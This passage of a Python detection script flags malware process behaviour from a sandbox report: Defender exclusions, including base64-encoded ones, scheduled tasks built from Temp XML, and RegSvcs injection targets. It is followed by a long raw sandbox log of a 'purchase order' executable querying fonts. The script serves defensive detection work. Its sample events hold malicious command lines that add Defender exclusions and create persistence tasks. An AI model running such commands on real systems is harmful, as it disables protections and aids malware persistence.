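    """Minimal process-creation record (Sysmon EID 1 / 4688-style fields; assumed shape)."""
    parent_image: str
    image: str
    command_line: str


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
_ENC_ARG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Set-MpPreference with an -Exclusion* parameter adds exclusions just like Add-MpPreference
_MP_EXCLUSION = re.compile(
    r"(?i)\b(?:add|set)-mppreference\b.*?-exclusion(?:path|process|extension|ipaddress)\b"
)
_SCHTASKS_XML = re.compile(r'(?i)/xml\s+"?([^"\s]+)')
_TEMP_DIR = re.compile(r"(?i)\\temp\\")            # AppData\Local\Temp, Windows\Temp, ...
_USER_WRITABLE = re.compile(r"(?i)\\(?:users\\[^\\]+\\(?:desktop|downloads|appdata)|programdata|temp)\\")
_DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe"}   # common .NET hollowing hosts


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or '' if absent/invalid."""
    m = _ENC_ARG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: ProcessEvent) -> list[str]:
    """Return the names of the rules that fire for one process-creation event."""
    hits: list[str] = []
    image = _basename(event.image)          # basename: SysWOW64 vs System32 does not matter
    cmd = event.command_line

    if image in ("powershell.exe", "pwsh.exe"):
        # Check the visible command line and, if present, the decoded -enc payload
        for text in (cmd, decode_encoded_command(cmd)):
            if text and _MP_EXCLUSION.search(text):
                hits.append("defender_exclusion_added")
                break

    if image == "schtasks.exe" and re.search(r"(?i)/create\b", cmd):
        m = _SCHTASKS_XML.search(cmd)
        if m and _TEMP_DIR.search(m.group(1)):
            hits.append("scheduled_task_from_temp_xml")

    if image in _DOTNET_UTILITIES:
        # Legitimate use passes an assembly path; no arguments, or a parent in a
        # user-writable directory, is the injection-target pattern seen in the report
        args = re.sub(r'^"[^"]*"|^\S+', "", cmd, count=1).strip()
        if not args or _USER_WRITABLE.search(event.parent_image):
            hits.append("dotnet_utility_injection_target")
    return hits


def scan(events) -> dict[str, int]:
    """Count rule hits over a batch of events."""
    counts: dict[str, int] = {}
    for ev in events:
        for rule in analyze(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed events mirroring the report's process tree (paths as listed in the report)
SAMPLE = "C:\\Users\\user\\Desktop\\purchase order - PO-011024-201.exe"
DROPPED = "C:\\Users\\user\\AppData\\Roaming\\jDCErdK.exe"
PS = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
SCHTASKS = "C:\\Windows\\SysWOW64\\schtasks.exe"
REGSVCS = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"

# Encoded variant: constructed for the example, not observed in this analysis
PLAIN_EXCLUSION = f'Add-MpPreference -ExclusionPath "{DROPPED}"'
ENCODED_VARIANT = base64.b64encode(PLAIN_EXCLUSION.encode("utf-16-le")).decode("ascii")

EVENTS = [
    ProcessEvent(SAMPLE, PS, f'"{PS}" Add-MpPreference -ExclusionPath "{SAMPLE}"'),
    ProcessEvent(SAMPLE, PS, f'"{PS}" -NoProfile -enc {ENCODED_VARIANT}'),
    ProcessEvent(SAMPLE, SCHTASKS,
                 f'"{SCHTASKS}" /Create /TN "Updates\\jDCErdK" /XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmpA55D.tmp"'),
    ProcessEvent(DROPPED, REGSVCS, f'"{REGSVCS}"'),
    # Benign controls (constructed): task XML outside Temp, and a read-only Defender query
    ProcessEvent("C:\\Windows\\System32\\svchost.exe", SCHTASKS,
                 f'"{SCHTASKS}" /Create /TN "Backup" /XML "C:\\ProgramData\\Backup\\task.xml"'),
    ProcessEvent("C:\\Windows\\explorer.exe", PS, f'"{PS}" Get-MpPreference'),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(analyze(ev) or "-", "<=", ev.command_line[:90])
    print(scan(EVENTS))
```

The rules return names rather than printing, so they drop into whatever pipeline consumes the events. Matching on the basename is deliberate: the report shows the sample asking for System32\WindowsPowerShell\v1.0\powershell.exe and SysWOW64 being what actually runs, and a rule keyed on the literal System32 path misses it.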
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Users\user\Desktop\purchase order - PO-011024-201.exe VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
